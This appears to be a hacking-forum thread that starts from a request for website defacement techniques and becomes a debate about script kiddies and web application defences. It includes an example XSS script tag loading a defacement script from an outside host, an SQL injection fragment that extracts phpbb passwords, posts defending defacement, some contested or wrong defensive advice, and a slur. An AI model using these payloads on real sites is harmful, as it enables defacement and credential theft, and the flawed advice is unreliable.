website defacement
Enter this in your URL bar; it's an old XSS technique to overflow the site and get root (i.e., admin).
Copy it exactly. It'll take a few minutes though, something like 10 minutes.
Edit: Guys, don't be so mean to **the new guy**. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future…
tuchezviper wrote: I need some guidance on which "technique" or attack method is most efficient when trying to deface a website? XSS perhaps?
You, sir, are an idiot.
Why would you ask a question you already knew the answer to? XSS is positively the best way to hack a site because no one knows about it and it's extremely hard to patch. If you can find a site with an XSS hole in it, you're practically guaranteed to get a nice hack in that everyone here will be proud of. You're on the right track. Keep up the good work! You're obviously going to be a great addition to this prestigious community.
spyware wrote:
Edit: Guys, don't be so mean to **the new guy**. Even if he knows nothing now, that doesn't mean he has to be a complete failure in the future…
I agree. I mean, after all, this is a place where we are supposed to learn and practice. Besides, we don't know if doing this could give him a self-esteem crisis.
Personally I think that defacing a site is lame! ESPECIALLY with XSS. I mean, come on, how hard is it: <script src=http://site.com/xss_deface.js></script>? See, it's lame! Also, what is the point of a deface? So you can advertise that you were smart enough to get into sensitive areas of a site? Excuse me if I'm wrong, BUT DOESN'T THAT NORMALLY THROW UP RED FLAGS? (I'll always laugh at idiots who deface and don't clear the logs or use a proxy.)
Moral of the story: don't be GAY!
exidous wrote: Personally I think that defacing a site is lame! ESPECIALLY with XSS. I mean, come on, how hard is it: <script src=http://site.com/xss_deface.js></script>? See, it's lame! Also, what is the point of a deface? So you can advertise that you were smart enough to get into sensitive areas of a site? Excuse me if I'm wrong, BUT DOESN'T THAT NORMALLY THROW UP RED FLAGS? (I'll always laugh at idiots who deface and don't clear the logs or use a proxy.)
Moral of the story: don't be GAY!
And yet, people bitch every day saying that hackers are no-good little punks with no morals or common decency.
…. hmm….
Good to know that people who can barely write properly are wrong about hackers.
{also, I like this moral, but that doesn't mean I've learned from it}
This is neither condoning nor excusing website defacement; it's simply an argument for you to ponder.
Why does a defacer always have to be a skid?
The best hackers in the world are more than capable of defacing websites. I'm not saying that they do, but they definitely can. And if they did, would that then make them skids?
Sure, skids often deface websites by grabbing the latest vulnerability and searching the web until they find a site that has it.
So my argument is simply that you cannot necessarily judge a skid by the act of defacement, only by the way in which the defacement was achieved.
exidous wrote: I'd almost bet you 60% of defacers use milw0rm; that is leaving brown skiddy marks in the internet's underwear!
I would say more than that percentage, and I agree with you; it still doesn't change my argument. Also, milw0rm is a great collection of vulnerabilities, and to never use it is just taking a valuable resource and throwing it away.
exidous wrote: I'd almost bet you 60% of defacers use milw0rm; that is leaving brown skiddy marks in the internet's underwear!
You aren't really a skiddy if you understand what the exploit does. And defacing could be used as a way to alert administrators to vulnerabilities. If you e-mail them multiple times and the vulnerability is still there, you're obviously going to have to fix the vulnerability for them. But if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to e-mails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.
I think you're twisting what I say. milw0rm is a good resource. But think of the people who think they're 1337 because they get a Google dork and then can copy-paste (and claim the fame). Oh man, that's 1337. I have met many people who use milw0rm just to look cool, post defaces, and claim the fame!
They have no clue what the exploit does, how it works, or even why. Example: select concat(user,0x3a,password) from phpbb_users-- OK, so how did they come to find that the table phpbb_users exists? Did they enumerate the tables? No! Can they enumerate the tables? Probably not!
Same for the columns. How did they come to find that there are columns user and password? Did they enumerate those? NO! They got the WHOLE INJECTION FROM MILW0RM! And that's just not 1337, it's skiddy, because they actually have no clue how to do what someone else has given them. And they think they're "hackers". And that's just one example. I can give many more. Hell, go to milw0rm and have a look. Tell me how 1337 you would be if you just took someone else's work and claimed it as yours.
Maybe that's the problem with today's "hackers": they all want someone else to do the work for them so they can claim it. No effort on learning the exploit inside and out.
Now don't get me wrong, I go to milw0rm at times. But I go there looking to learn something new, then understand how and why it works, so I can do the same thing that the author of the exploit did, with my own techniques and efforts. Not some copy-paste skid turd!
hacker2k wrote:
You aren't really a skiddy if you understand what the exploit does. And defacing could be used as a way to alert administrators to vulnerabilities. If you e-mail them multiple times and the vulnerability is still there, you're obviously going to have to fix the vulnerability for them. But if it's their code, how do you stop them from making the same mistake in a different place? They aren't replying to e-mails. You either leave a note on their server or you change the homepage. Either way it would be considered defacing.
And here's the thing: it's not your responsibility to fix the code for them. If they don't respond to the emails that you send them, they don't have to. You're not in charge of their actions. If they choose not to respond, who are you to punish them?
It's not punishment. You fixed their vulnerability and the site is defaced for a few minutes. Just make a backup and link to the backup so that people that need the site can still get to it. You emailed them exactly what the vulnerability was so they know what not to do anymore. As far as I'm concerned, it's a service that they are getting for free.
tch0rt wrote: Yes, because a skid who defaces creates a backup and links to it.
Skids are the ones you scare to death by threatening to prosecute so that you get rid of a 31337-retard :D. They're there for entertainment. Also, if a skid defaces your site, you don't deserve to have a site. :p
As for the service thing, the only people who try to get an ego boost are skids. Skids don't gain anything from using a script to deface a website (except cred with their u83r 1337 friends).
tch0rt wrote: Yes, because a skid who defaces creates a backup and links to it. It's not a service; don't try and fool yourself. People deface sites for nothing more than an ego boost and to show off how l337 they are.
Even though I agree, you shouldn't forget those who target sites on the basis of content instead of vulnerability, even though they're very much the minority.
I really don't believe defacer = skid. If you hack into a website, what does it matter what you do with the access? It has to do with morals, and nothing to do with skill. Now, this doesn't go for the actual skids who use a ready-made vulnerability and exploit to 'hack' a website. But for the actual hackers, does it mean they have less skill if they replace the index rather than steal account passwords :whoa:?
Infam0us wrote: I really don't believe defacer = skid. If you hack into a website, what does it matter what you do with the access? It has to do with morals, and nothing to do with skill.
Well, I think that's both right and wrong. It's about delivery. The difference is that the hacker could do it any time he/she pleases, while the skiddie can only do it by ripping off someone else's idea. Did the hacker study the site, look for any vulnerability it had, and then hop on it? A skiddie is someone who sucks so much at exploiting things on their own that they have to look up 0days, download tools, watch feeds for stuff that was just found vulnerable overnight, etc., and take that route. As for what you do with the access: someone with any amount of experience will just do what has to be done and try hard not to make it known. You can guess what the skiddie does, though.
@op, XSS is serious business, like you already know. Here's the OWASP top 10 for 2007. Idk, it's a good start. http://www.owasp.org/index.php/Top_10_2007
logicbomb wrote: hacker2k wrote: Also, if a skid defaces your site, you don't deserve to have a site. :p
You're serious?
Yes. Since the skid is using exploits from milw0rm, etc. you are able to prevent the attack. Sometimes with the exploits they give you the code that's vulnerable. If it doesn't already have a patch out, you can just code it yourself. It's usually as simple as putting in a filter function. Also, most of the time when you see exploits on those sites, the people who posted them are white-hats and already told the software developers. They probably already released a patch that you didn't stay on top of. It's your fault that you got hacked because you didn't stay on top of patching. If you can't stay on top of patching and vulnerabilities, what are you doing hosting a site?
hacker2k wrote:
Yes. Since the skid is using exploits from milw0rm, etc. you are able to prevent the attack. Sometimes with the exploits they give you the code that's vulnerable. If it doesn't already have a patch out, you can just code it yourself. It's usually as simple as putting in a filter function. Also, most of the time when you see exploits on those sites, the people who posted them are white-hats and already told the software developers. They probably already released a patch that you didn't stay on top of. It's your fault that you got hacked because you didn't stay on top of patching. If you can't stay on top of patching and vulnerabilities, what are you doing hosting a site?
So what you're saying is that everyone with a website should be a coder? Also, your whole argument collapses when you get to this part: "They probably already released a patch that you didn't stay on top of."
I agree that there's no excuse for not patching, but what about the people who DO patch regularly and then get hacked? Those people are just lazy for not analyzing the code themselves for vulnerabilities? So then anyone with a website must not only be a coder, but also a code analyzer/patcher.
Did you even think of all of the implications of your sweeping generalization before you put literally ALL the blame on webmasters for jackoffs running around needlessly attacking websites?
logicbomb wrote: hacker2k wrote:
Yes. Since the skid is using exploits from milw0rm, etc. you are able to prevent the attack. Sometimes with the exploits they give you the code that's vulnerable. If it doesn't already have a patch out, you can just code it yourself. It's usually as simple as putting in a filter function. Also, most of the time when you see exploits on those sites, the people who posted them are white-hats and already told the software developers. They probably already released a patch that you didn't stay on top of. It's your fault that you got hacked because you didn't stay on top of patching. If you can't stay on top of patching and vulnerabilities, what are you doing hosting a site?
So what you're saying is that everyone with a website should be a coder? Also, your whole argument collapses when you get to this part: "They probably already released a patch that you didn't stay on top of."
I agree that there's no excuse for not patching, but what about the people who DO patch regularly and then get hacked? Those people are just lazy for not analyzing the code themselves for vulnerabilities? So then anyone with a website must not only be a coder, but also a code analyzer/patcher.
Did you even think of all of the implications of your sweeping generalization before you put literally ALL the blame on webmasters for jackoffs running around needlessly attacking websites?
The webmasters should check out all the common places that skids get exploits. If you see an exploit, you'll see what variable is being exploited. Once you see that, you can find where it is in the code. When you find it, you just add a filter to it. You don't need to be a coder to figure that out. If you have a site, you most likely have someone who codes for you if you don't do it yourself. Have them try to find the vulnerable spot and fix it. If you don't have someone like that, then take that section of the site down until a patch is released. It shouldn't take long for the developers to come out with a patch. On top of that, I'm sure you have other people on forums, IRC, etc. writing a patch for it even if they aren't a developer. Simply ask if anyone happened to write a patch for it already. I'm sure they'd be willing to give you the code so that you can secure your site. If you get hacked within the first few minutes or hours after the exploit was released, it's no one's fault.
logicbomb wrote: So what you're saying is that everyone with a website should be a coder?
No… everyone with a website should take responsibility to maintain it adequately (whether they are a coder or they choose to hire a coder) and suck it up when they get hacked.
hacker2k wrote: The webmasters should check out all the common places that skids get exploits. If you see an exploit, you'll see what variable is being exploited. Once you see that, you can find where it is in the code. When you find it, you just add a filter to it. You don't need to be a coder to figure that out. If you have a site, you most likely have someone who codes for you if you don't do it yourself. Have them try to find the vulnerable spot and fix it. If you don't have someone like that, then take that section of the site down until a patch is released. It shouldn't take long for the developers to come out with a patch. On top of that, I'm sure you have other people on forums, IRC, etc. writing a patch for it even if they aren't a developer. Simply ask if anyone happened to write a patch for it already. I'm sure they'd be willing to give you the code so that you can secure your site. If you get hacked within the first few minutes or hours after the exploit was released, it's no one's fault.
Exploiting is a technique that is independent of variables. It's not a weak variable that is causing the problem… it is a weak secure coding technique that is constant and, thus, requires a persistent and reusable solution. Also, it's not just "finding the variable and patching it"… if you're not a coder, you will not know how to do anything close to that. Take PHP for example… find the variable, toss it through mysql_real_escape_string (just in case you're Google-lucky), and you'll still get burned by someone with at least an intermediate understanding of PHP. Also, removing a section of your site because an exploit exists… is dumb. Either get it fixed, or stop playing webmaster. Otherwise, you'll be picking the mold off of that site often.
I always say this, and I'll say it again… if you want bleeding-edge patches for your favorite software packages, get on their mailing list!
As for the rest of this thread… shrugs
Zephyr_Pure wrote: Exploiting is a technique that is independent of variables. It's not a weak variable that is causing the problem… it is a weak secure coding technique that is constant and, thus, requires a persistent and reusable solution. Also, it's not just "finding the variable and patching it"… if you're not a coder, you will not know how to do anything close to that. Take PHP for example… find the variable, toss it through mysql_real_escape_string (just in case you're Google-lucky), and you'll still get burned by someone with at least an intermediate understanding of PHP. Also, removing a section of your site because an exploit exists… is dumb. Either get it fixed, or stop playing webmaster. Otherwise, you'll be picking the mold off of that site often.
I always say this, and I'll say it again… if you want bleeding-edge patches for your favorite software packages, get on their mailing list!
As for the rest of this thread… shrugs
I agree, but who cares if it's not reusable or the best solution? Use it as a temporary fix until the developers come out with a patch. Also, it will block out skids, who are the ones most likely to be using that exploit, since they won't have an understanding of PHP. They will move on when they find out the pre-made exploit isn't working, because they want a quick and easy "hack".
Yeah, it's dumb to take a portion of the site off, but if you aren't going to come up with a temporary solution, aren't going to try to find someone who has already written a patch, can't write your own patch, and don't want to get hacked, you will have to be either lucky, not in Google, or take the exploitable portion of the site down.
And, yes, usually it is an unfiltered variable (used in exploits). Most web-application exploits are XSS and SQL injections. Look at that: both can be protected against if you just filter your variables! XSS - htmlspecialchars() (or whatever filter you like better); SQL injection - mysql_real_escape_string().
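The XSS half of that advice, sketched in Python rather than PHP so it's self-contained: `html.escape` plays roughly the role hacker2k assigns to htmlspecialchars(), turning markup in untrusted input into inert text before it is echoed back into a page. The payload string is the joke example from earlier in the thread; this is a minimal sketch, not a complete XSS defense.

```python
import html

# Untrusted input as it might arrive in a request parameter.
payload = '<script src=http://site.com/xss_deface.js></script>'

# Escape before echoing it back into a page -- the Python analog
# of PHP's htmlspecialchars(). < > & " ' all become entities.
safe = html.escape(payload)
print(safe)
# &lt;script src=http://site.com/xss_deface.js&gt;&lt;/script&gt;
```

The browser now renders the tag as literal text instead of fetching and executing the script.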
hacker2k wrote: I agree, but who cares if it's not reusable or the best solution, use it as a temporary solution until the developers come out with a patch.
Umm… the idiot that's going to be temp-patching 5 times a day for the next 3 years and bleeding sensitive info like there's no tomorrow… should care. Re-read what I wrote; it's not about patching, it's about proper coding practices in the first place. The object of the patching should not just be a single variable or routine… once you find a vulnerability in one place, it's likely you'll find a similar one in another place due to bad coding practices.
Also, it will block out skids, who are the ones most likely to be using that exploit, since they won't have an understanding of PHP. They will move on when they find out the pre-made exploit isn't working, because they want a quick and easy "hack".
Yeah, because a skid has the capability to find the exploit in the first place… not all vulnerabilities are found by a "good guy" that hands it over to the vendor as soon as he finds it. You assume way too much with your generalizations and, ultimately, you're invalidating your whole argument because it's opinion, not fact.
Yeah, it's dumb to take a portion of the site off, but if you aren't going to come up with a temporary solution, aren't going to try to find someone who has already written a patch, can't write your own patch, and don't want to get hacked, you will have to be either lucky, not in Google, or take the exploitable portion of the site down.
No… as a webmaster, you have a responsibility to maintain your site. If you're using a pre-made package and you can't code, your best bet is to wait for a user or the vendor to come up with a patch. If you can code, look into it and try to get at the underlying problem. If you're going to take a portion of the site down because of a possible vulnerability, then just take the whole thing down… it'll all get hacked eventually.
And, yes, usually it is an unfiltered variable (used in exploits). Most web-application exploits are XSS and SQL injections. Look at that: both can be protected against if you just filter your variables! XSS - htmlspecialchars() (or whatever filter you like better); SQL injection - mysql_real_escape_string().
You're not getting it. The variable is not the source of your trouble… it's the fact that it's not filtered there, which means it's likely not filtered elsewhere. Also… XSS and SQL injections are just two attack vectors; LFI/RFI, blind SQL injection, CSRF, HTML injection, etc. are all just as common. XSS and SQL injections are most common among inexperienced hackers because they require little technique in the majority of cases… but do not underestimate the group of people that you are defending against, as they are not all "skids".
Also… you're going to have to dig a lot deeper if you want to correctly filter your variables. One function will not do it for you. Read up on those two functions and see exactly what they protect against, then catch up on common techniques for those two attack vectors… then, start patching the holes in your assumptions.
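Zephyr_Pure's point that a single escape function won't save you is, incidentally, why later advice largely abandons escape-and-splice for SQL in favor of parameterized queries, where the input is bound as data and never enters the SQL text at all. A minimal sketch in Python (sqlite3 purely for a self-contained demo; the schema and values are invented):

```python
import sqlite3

# Throwaway in-memory database standing in for the site's real DB.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'hunter2')")

def find_user(name):
    # The ? placeholder binds the input as a value: it is never
    # spliced into the SQL string, so quoting tricks and charset
    # edge cases that escape functions can miss never reach the parser.
    cur = conn.execute("SELECT name FROM users WHERE name = ?", (name,))
    return cur.fetchall()

print(find_user("alice"))        # [('alice',)]
print(find_user("' OR '1'='1"))  # [] -- the classic injection string is inert
```

The same placeholder style exists in essentially every database driver, which is what makes it a persistent, reusable fix rather than a per-variable patch.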
1.) I said make a temporary fix for it until it gets patched. I hope it doesn't take 3 years for the vulnerability to get patched by the vendor.
2.) I didn't say all exploits are found by a "good guy"; I know people who aren't "good guys" who find vulnerabilities and don't report them. I also didn't say the skid has the capability to find the vulnerability. I am only talking about skids anyway, so that's why I'm not taking into account the fact that there are others, and why I really don't have to talk about the people who find vulnerabilities, don't report them to the vendor, and don't write exploit code and put it on milw0rm or wherever.
3.) You don't want it to get hacked, so you can take down a portion of the site just temporarily until someone reports the vulnerability to the vendor and the vendor fixes it. Again, I'm talking about protecting from a skid, so all anyone needs to do is give the exploit code to the vendor and the vendor can figure it out. Meanwhile, since you can't code and you can't find anyone who has patch code written, you will be protecting your site overall if you take down a portion of it. Let's say you have a site with a forum and also a customer login, etc. The forum has a vulnerability, but the portion of the site with the customer login does not. Take down the forum so you can protect the rest of the MySQL server from people getting customer information through the forum.
4.) I know that XSS and SQL injections aren't the only types of vulnerabilities. Don't underestimate what I know. What I said was that XSS and SQL injections are the common vulnerabilities that you see on milw0rm, etc. for web applications. On another note, HTML injection = XSS just so you know. Also, I know what the two functions that I said would prevent SQL injection and XSS do. Sure, there might be ways to get around it, but that isn't the point. My point is, they're easy to create a fix for so that the exploit won't work for the skids that try to use it on your site. For LFI/RFI vulnerabilities, just use a case statement instead of taking the file that is in the GET/POST request and using it to include/fopen a file. To block CSRF just use some type of authentication when doing anything important. Even just a captcha could be used to help with that.
Is there anything that I'm forgetting to address in your reply?
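The "case statement instead of including whatever is in the GET request" idea from point 4 is a whitelist. A Python sketch of the shape of it (the page names and file paths here are invented examples):

```python
# Whitelist of page names the application is willing to serve --
# the "case statement" from the post. Names and paths are examples.
PAGES = {
    "home":    "pages/home.html",
    "about":   "pages/about.html",
    "contact": "pages/contact.html",
}

def resolve_page(requested):
    # Unknown values fall back to a safe default, so a request like
    # "?page=../../etc/passwd" or "?page=http://evil/shell.txt"
    # never reaches the include/open call.
    return PAGES.get(requested, PAGES["home"])

print(resolve_page("about"))             # pages/about.html
print(resolve_page("../../etc/passwd"))  # pages/home.html
```

Because only values you put in the table can ever be opened, this closes both the LFI and RFI variants in one move.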
On another note, HTML injection = XSS just so you know.
It is not… XSS = cross-site scripting, so you use e.g. JavaScript to exploit it (steal cookies). HTML injection is e.g. injecting <h1>you've been h4x00red n000bz</h1>.
Also, I don't want to join your discussion, but you really should distinguish between custom-made pages and a CMS, etc…
hacker2k wrote: 1.) I said make a temporary fix for it until it gets patched. I hope it doesn't take 3 years for the vulnerability to get patched by the vendor.
If you have enough programming competency to make a temporary fix, you can put in more than a half-assed effort to come up with a real solution.
2.) I didn't say all exploits are found by a "good guy", I know people that aren't "good guys" that find vulnerabilities and don't report them.
Then you realize you're not just facing skids… or did you? Quote: "Also, it will block out skids which are the ones that will probably be using that exploit so they won't have an understanding of PHP."
I also didn't say the skid has the capability to find the vulnerability. I am only talking about skids anyway, so that's why I'm not taking into account the fact that there are others, and why I really don't have to talk about the people who find vulnerabilities, don't report them to the vendor, and don't write exploit code and put it on milw0rm or wherever.
Oh, okay… so, instead of this being an intellectual point that you're trying to prove, you're just ranting about skids? Well, that's a joyful re-hash of hundreds of craptacular threads all boiled into one steaming pile of the present. If you leave out the people that you excluded ("the people who find vulnerabilities and don't report them to the vendor and don't write exploit code and put it on milw0rm or whatever"), then you're leaving out the real threat, arguing a narrow-minded and naive mindset, and basically wasting everyone's time.
<snip>More anti-skid activity, then I'll be invincible… </snip> Let's say you have a site where you have a forum and then you have a customer login, etc. The forum has a vulnerability, but the portion of the site with a customer login does not. Take down the forum so you can protect the rest of the MySQL server from people getting customer information through the forum.
If you are handling customer info, you better damn well spend the money to get the security or to get a coder in there. Otherwise, your customer base will go down the toilet before long.
I rearranged the order of the sentences in the fourth item so that it might look a little clearer for the readers:
I know that XSS and SQL injections aren't the only types of vulnerabilities. What I said was that XSS and SQL injections are the common vulnerabilities that you see on milw0rm, etc. for web applications.
Skid food. Irrelevant. Next.
For LFI/RFI vulnerabilities, just use a case statement instead of taking the file that is in the GET/POST request and using it to include/fopen a file.
Close… I would've accepted "white list" for this one as well. Sanitize for code injects and HTML/script injects, string replace / regex replace for directory traversals and off-site includes, then consider a whitelist.
To block CSRF just use some type of authentication when doing anything important. Even just a captcha could be used to help with that.
Umm… no. Authentication maintains who you are, not where you are.
Also, I know what the two functions that I said would prevent SQL injection and XSS do. Sure, there might be ways to get around it… On another note, HTML injection = XSS just so you know. Don't underestimate what I know.
No… HTML injection != XSS. HTML injection injects content to disrupt the layout or intent of a page. XSS uses content to trick a user or the user's browser into divulging information. Different goals there, as well as different execution. So, apparently… I am estimating what you know just fine.
If there are ways to get around it, then why crutch yourself by relying on those solely with the excuse that it "deters skids"? Yeah, sure, okay, you just eliminated 80% of the people that will attack your site… and the other 20% are going to bust your balls, bend you over, and leave your site in shambles. Yeah, let's go for the least dangerous ones first. Threat mitigation is not an excuse for intentionally not learning to do something the best you can… not when there is threat prevention.
My point is, they're easy to create a fix for so that the exploit won't work for the skids who try to use it on your site. Is there anything that I'm forgetting to address in your reply?
Yeah… the educational light at the end of the tunnel? The other 20% of the security world? Logical and well-founded points about web application defense?
Seriously, the goal of this site is to get educated about security… so, there's no need to argue a point that is swimming in ineptitude and that should've never found solid ground in the first place.
Edit: This may very well be my longest post ever… nah, probably not. :)
logicbomb wrote: hacker2k wrote: Also, if a skid defaces your site, you don't deserve to have a site. :p
You're serious?
^ — Just in case you didn't know where this conversation came from. It started out as just skids, so it should be continued as just skids.
I'm not ranting about skids. If you want to talk about the rest of the people who are malicious and don't report the vulnerabilities or code exploits for milw0rm, then you should really be talking about how to keep their options limited after they get in and how to do intrusion analysis.
I'm also not talking about using a password or anything for authentication. I'm talking about using some protection so that an attacker can't just make the browser do a GET request (or whatever) to a site, with the browser thinking it's fetching something useful, and end up doing something that will harm you. That's why I said a captcha alone could help in that case.
HTML Injection: http://admin.utep.edu/Default.aspx?tabid=54090
You want logical and well-founded points? Filter all input; validate everything the user gives to your site. If they go off-track or seem like they're doing something malicious, log it. Use custom error messages in your scripts instead of just letting PHP output the errors. Stay on top of patches if it isn't your own code. If it is your own code, do regular tests on it to see if you can find a vulnerability. Have friends also test it to see if they can find bugs that could be exploited. Fix even the tiniest bug, because that could turn into a vulnerability. Watch things like Bugtraq and milw0rm for web-application vulnerabilities. Read everything you can about security.
Skids are the people that will normally use the code because they want a quick "hack" and thus more exploit users will be skids than non-skids.
P.S. I just picked out the more relevant parts of your response.
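The "filter all input, validate everything, log anything suspicious" checklist above, reduced to a minimal Python sketch (the field name and pattern are invented examples; a real application would have one such rule per input):

```python
import logging
import re

logging.basicConfig(level=logging.WARNING)
log = logging.getLogger("webapp")

# Whitelist pattern for one field: validate what input SHOULD look
# like rather than blacklisting known-bad strings.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,20}")

def validate_username(value):
    if USERNAME_RE.fullmatch(value):
        return value
    # Anything off-pattern gets logged, so probing for holes leaves
    # a trail -- the "log it" step from the post.
    log.warning("rejected input: %r", value)
    return None

print(validate_username("alice_99"))     # alice_99
print(validate_username("' OR 1=1 --"))  # None
```

The point of validating against the expected shape, instead of filtering out known attack strings, is that it rejects injection attempts you haven't thought of yet.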
hacker2k wrote: ^ — Just in case you didn't know where this conversation came from. It started out as just skids, so it should be continued as just skids.
Then, like I said… that conversation is pointless.
If you want to talk about the rest of the people who are malicious and don't report the vulnerabilities or code exploits for milw0rm, then you should really be talking about how to keep their options limited after they get in and how to do intrusion analysis.
I'd settle for that as having more purpose than an anti-skid methodology discussion.
I'm also not talking about using a password or anything for authentication. I'm talking about using some protection so that an attacker can't just make the browser do a GET request (or whatever) to a site, with the browser thinking it's fetching something useful, and end up doing something that will harm you. That's why I said a captcha alone could help in that case.
Can't say I see how a captcha would inhibit CSRF attempts. Would love to hear your ideas on that.
HTML Injection: http://admin.utep.edu/Default.aspx?tabid=54090
Here's a better link: http://www.technicalinfo.net/papers/CSS.html
If we're going to get into semantics, then let's just refer to everything as an "attack vector" when we're discussing specifics. That way, we can ignore classification based upon intended use and just play dictionary tag every time we try to perceive meaning.
You want logical and well-founded points? If they go off-track or seem like they're doing something malicious, log it.
Too broad.
Stay on top of patches if it isn't your own code. If it is your own code, do regular tests on it to see if you can find a vulnerability. Have friends also test it to see if they can find bugs that could be exploited. Fix even the tiniest bug, because that could turn into a vulnerability. Watch things like Bugtraq and milw0rm for web-application vulnerabilities. Read everything you can about security.
Still broad and lofty, but better. Why do the tips only apply to people that own the code… not including the people that use it?
I was just thinking of a captcha because, since it's probably going to be unique for everyone, the attacker couldn't abuse a trust relationship by changing passwords, etc. through JavaScript or even just HTML. For example, Bill is the administrator of site A, which is vulnerable to a CSRF attack that would allow an attacker to change Bill's password. Bill then goes to a site owned by the attacker. Bill didn't log off of site A, so his session is still active. The attacker uses an image to execute the change-password script on site A. Since site A made no attempt to make sure the party requesting a password change was a human and not a browser, the attacker was able to gain administrative access to site A. A captcha would distinguish between a browser making an automated request (which could have been forced by a malicious attacker) and a user clicking the button. Really, anything that is unique to a session could be used to protect against CSRF. I don't know a lot about CSRF, so I might be wrong in my thinking, but that should protect against it from what I understand. Correct me if I'm wrong, though.
I don't use a lot of other people's code, so I don't really know much about how to protect against attacks in code that isn't your own, except for common sense like staying on top of patches. Reading about common vulnerabilities is what I meant by "read everything you can about security"; I know that really wasn't clear. By doing regular tests, I meant try to hack your own web applications and see if you can find vulnerabilities. If you are a big enough company, hire penetration testers (that's good for both your code and other people's code). By going off-track, I meant that if it looks like someone is trying to find a vulnerability, have it logged. You can do that while filtering input. Did that clear it up?
hacker2k wrote: I was just thinking of a captcha because, since it's probably going to be unique for everyone, the attacker couldn't abuse a trust relationship by changing passwords, etc. through JavaScript or even just HTML. For example, Bill is the administrator of site A, which is vulnerable to a CSRF attack that would allow an attacker to change Bill's password. Bill then goes to a site owned by the attacker. Bill didn't log off of site A, so his session is still active. The attacker uses an image to execute the change-password script on site A. Since site A made no attempt to make sure the party requesting a password change was a human and not a browser, the attacker was able to gain administrative access to site A. A captcha would distinguish between a browser making an automated request (which could have been forced by a malicious attacker) and a user clicking the button. Really, anything that is unique to a session could be used to protect against CSRF. I don't know a lot about CSRF, so I might be wrong in my thinking, but that should protect against it from what I understand. Correct me if I'm wrong, though.
I know there are some sites that protect against off-site navigation and such. Best I can tell, it's probably a case where a link gets a JS check for either a non-relative web address or an absolute address that doesn't point to a site on the blah.com domain. If it leads off the site, an intermediate page is served up that captures the page you came from and the destination ($_SERVER variable for the first, maybe a session var for the second) and asks you if you're sure.
Now… we couldn't just add a manual link check (anchor tag only) because CSRF is not limited to that; while href and src are the most common attributes for a CSRF attack, there's nothing to say that any old JS event and a window.location assignment won't serve the same purpose. So, we'd have to capture the JS event that occurs when a page is navigated away from, then do our check. That would be the onunload or onbeforeunload events, which we'd put in our body tags and toss in our JS function to check the destination URL. As for getting the destination URL in JS, that is where I'd have to do some homework… really, I haven't bothered with anything like this because I disallow HTML altogether. But, it could be done… and, if you want to do the middle page to check if you're sure, you could have the JS event populate hidden fields in a form on the page and submit the form with the action to navigate to that middle page. For a POST.
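On the homework part: onunload/onbeforeunload fire without telling you where the browser is headed, so in practice you'd intercept the click itself and inspect the anchor's href. A rough sketch of the destination check, keeping blah.com as the placeholder domain from above (the confirmation-page path is hypothetical):

```javascript
// Decide whether a destination URL leaves our domain. "ourHost" would be
// location.hostname in a browser; "blah.com" is just the example domain.
function isOffsite(dest, ourHost) {
  // Relative URLs (no scheme, no protocol-relative "//") stay on the site.
  if (!/^[a-z][a-z0-9+.-]*:/i.test(dest) && !dest.startsWith('//')) {
    return false;
  }
  try {
    const host = new URL(dest, 'http://' + ourHost).hostname;
    // Same host, or a subdomain of it, counts as on-site.
    return host !== ourHost && !host.endsWith('.' + ourHost);
  } catch (e) {
    return true; // unparseable destination: treat as off-site to be safe
  }
}

// Browser-only wiring, sketched as comments so the check above stays
// runnable on its own ("/leaving.php" is a made-up intermediate page):
// document.addEventListener('click', (e) => {
//   const a = e.target.closest('a');
//   if (a && isOffsite(a.href, location.hostname)) {
//     e.preventDefault();
//     location.href = '/leaving.php?to=' + encodeURIComponent(a.href);
//   }
// });

console.log(isOffsite('/about.html', 'blah.com'));         // false
console.log(isOffsite('http://evil.example/', 'blah.com')); // true
```

Note this only covers links a user clicks; as the post says, any JS event that assigns window.location can still navigate away, which is why disallowing HTML altogether remains the blunt but reliable option.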
So, really, a captcha wouldn't be any more helpful than a normal page. Captchas are just for preventing bot automation of a page's form.
I don't use a lot of other people's code, so I don't really know much about how to protect against attacks in code that isn't your own, except for common sense like staying on top of patches. Reading about common vulnerabilities is what I meant by "read everything you can about security"; I know that really wasn't clear. By doing regular tests, I meant try to hack your own web applications and see if you can find vulnerabilities. If you are a big enough company, hire penetration testers (that's good for both your code and other people's code). By going off-track, I meant that if it looks like someone is trying to find a vulnerability, have it logged. You can do that while filtering input. Did that clear it up?
Well, as long as you're using the same language, it's going to be the same practices at work. Other people's code might be harder to read or understand, but that doesn't really matter… Common vulnerabilities are good to read about, but secure coding practices are better and more comprehensive.
Regular tests on your site are good as long as the testers are people you either trust or have contractually bound. Still… "going off-track" is vague. Sit down and make a list of the things you'll be tracking… the patterns you'll be looking out for, and you'll realize that's a pretty big and difficult list.